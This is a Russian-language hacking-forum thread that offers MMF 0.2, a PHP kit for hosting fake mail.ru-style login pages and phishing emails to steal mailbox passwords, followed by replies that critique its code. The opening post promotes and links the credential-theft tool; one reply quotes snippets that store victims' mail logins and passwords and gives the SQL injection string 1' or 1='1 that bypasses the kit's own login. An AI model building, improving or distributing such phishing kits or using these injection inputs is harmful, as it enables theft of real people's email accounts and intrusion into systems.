[MMF] 0.2 MMF - MultiMailFake.Скрипт служит,для создания Фейк сервисов,для кражи паролей от mail.ru\аналогов. Возможности: [+] -Регистрация пользователей\Личный кабинет(мульти режим) [+] -Отправка Письма жертве прям из скрипта.(со втроенным примером) [+] -Отправка отчетов пользователю на email(по желанию) [+] -++ Изменен интерфейс.Местами переписан. Вообщем пока, что скрипт простоват,но работает вполне отлично. Писал для своего будущего сервиса,но потом желание пропало,да и дел по мимо него много. А так как я за Опенсурс,то скрипты радушно выкладываю в паблик) Код кривоват,но работает.... Просьба не писать комментарии,с текстом типа: а я бы сделал вот так ... Так как мне ровно пофиг,как бы вы сделали..... Скачать MMF 0.2
Привыкли писать скрипты на error_reporting(0); Code: Notice: A session had already been started - ignoring session_start() in C:\wamp\www\1\regi.php on line 59 Notice: Undefined variable: POST in C:\wamp\www\1\regi.php on line 63 Notice: Undefined variable: POST in C:\wamp\www\1\regi.php on line 64 Notice: Undefined variable: POST in C:\wamp\www\1\regi.php on line 65 Во вторых: PHP: $login = mysql_real_escape_string($_POST['login']); $password = $_POST['password']; $query = "SELECT `id` FROM `users` WHERE `login`='{$login}' AND `password`='{$password}' LIMIT 1"; Логин обезопасил а пароль ненадо? Ну тогда лови скуль: Любой логин и пароль: Code: 1' or 1='1 Авторизация проходит. Если чесно, не в обиду, скрипт УГ)))) После скули дальнейший код не смотрел, интерес пропал.
Дебагнул... Ну давай напиши лучще... Где от тебя хоть один норм релиз? только вечно и умеешь что обсирать.....
1. Запросы = queries на английском. Базовые знания английского 2. Пути статические. Например, я кинул скрипт в папку MMF, а после cмены настроек, например, редирект идет на /logi.php. Так же и с формой фейка. 3. PHP: if (@$_GET['mod'] !== "logi" && @$_GET['mod'] !== "mail" && @$_GET['mod'] !== "test" && @ $_GET['mod'] !== "sett" && @$_GET['mod'] !== "delete" && @$_GET['mod'] !== "exit") in_array ф-цию не просто так придумали 4. PHP: !preg_match("/^[\d]+$/i", $_GET['page']) is_numeric - намного проще, быстрее, удобнее, легче. 5. PHP: $vuvod $primer Никогда еще не видел кода с переменными на транслите русского языка.
mailbrush я думаю нет смысла критиковать названия переменных, т.к. релиз бесплатный и выложен для того, чтобы исправить код, помочь. имена переменный каждый задает так, как ему удобно. есть смысл их критиковать, если скрипт выполнен на заказ, хотя ТСу ещё далеко для выполнения заказов.
Мальчик не выёбуйся, когда тебе указывают на ошибки, а учись выслушать и вынести с этого пользу. Я не стал писать что ты быдла кодер, я сказал что идея скрипта УГ, но судя по всему и ты тоже Г... раз неможеш адекватно воспринять критику, держы быдлан: файл regi.php: PHP: session_start(); Раскрытие путей через точку в сессии , исправление: PHP: @session_start(); Нет проверки на занятость ника при регистрации: Потому что быдло код: PHP: $ch_login = strtolower($login); $pass = $pass; $sql = @mysql_query("SELECT * FROM `users` WHERE `login` = '".$ch_login."'"); if(mysql_num_rows($sql) > 0) { echo'Аккуант с таким логином уже зарегистрирован!<br /><br />'; } Неработает, догадайся почему. PHP: elseif($email and !preg_match("#^[_\.0-9a-z-]+@([0-9a-z][0-9a-z-]+\.)+[a-z]{2,6}$#", $email)) { echo'Неверный формат email!<br /><br />'; } Зачем ты делаеш конкатенацию строк, если используеш двойные ковычки? PHP: mysql_query("INSERT INTO `$db_name`.`users` (`login` ,`password` ,`email`) VALUES ('".$_POST['login']."', '".$_POST['pass']."', '".$_POST['email']."');"); ЗЫ Ты юморист PHP: $pass = $pass; Index.php Скуль не закрыта: PHP: $login = mysql_real_escape_string($_POST['login']); $password = $_POST['password']; $query = "SELECT `id` FROM `users` WHERE `login`='{$login}' AND `password`='{$password}' LIMIT 1"; Конструкция: PHP: $query = mysql_query("SELECT * FROM `users` ORDER BY `id` ASC"); $vsego = mysql_num_rows($query); echo'<td class=border>Пользователей:'.$vsego.'</td><br>'; $query = mysql_query("SELECT * FROM `querys` ORDER BY `id` ASC"); $vsego = mysql_num_rows($query); echo'<td class=border>Записей:'.$vsego.'</td>'; 4 запросса!!! Хотя можно было бы: Code: SELECT count(*) FROM users UNION SELECT count(*) FROM querys; Регулярки ето клёво, но не до такой степени: PHP: if ( !isset($_GET['page']) or empty($_GET['page']) or $_GET['page'] < 0 or !preg_match("/^[\d]+$/i",$_GET['page']) ) $show = 0; Кстати /^[\d]+$/i модификатор i жжот в проверке на число. Воощем в итоге я запутался в твоей писанине, непонятно зачем ты продублировал регистрацию еще и в файле logi.php Вот еще гавнокод без проверок, делай что хочеш, просто мего сервис по тренировке хацкеров. PHP: $query = "INSERT INTO querys(user, time, query, referer, ip, user_agent, maillogin, mailpass) VALUES('".$login1."','".$time."','".$in_ip."','".$reftext."','".$ip."','".$otherinf."','".$login."','".$password."')"; mysql_query($query); Вот ета часть кода у меня не заработала: PHP: if{$row['mail_status'] = 1}{ Я заменил на PHP: if($row['mail_status'] = 1){ если ты не против. Далее: PHP: $mail = strtr($mail); Code: Warning: strtr() expects at least 2 parameters, 1 given in C:\wamp\www\1\auth.php on line 42 И вот что-то сфейлил: Code: Fatal error: Call to undefined function mailenc() in C:\wamp\www\1\auth.php on line 43 Там еще файл какой-то пытался скрипт открыть, но не нашел его: PHP: $maillist = file("baza.txt"); Че за файл? Ридми нету, телепаты в отпуске. Вообщем сил больше нету, в этом "коде" можно коментировать практически каждую 2-ю строку "кода". Во-первых мне некогда писать подобные релизы, хотя я бы писал с удовольствием, но у меня нет времени, мне приходится работать, т.к. возраст 24 года. Во-вторых ты не видел все мои релизы, поетому не тебе судить. В третих я не обсираю, я указываю на ошибки, если ты в каждом критикуюшем видеш патенциального врага ето твои проблемы/комплексы.
и так что мы имеем. Из всего выше описаного я нашел толлько 1 неработающую хрень с опправкой отчетов на мыло, это то что я забыл поставить = а остальное мое желание и мелкие недоделки. вообщем разработка всеравно заморожена.кому нужно будет - доделает.
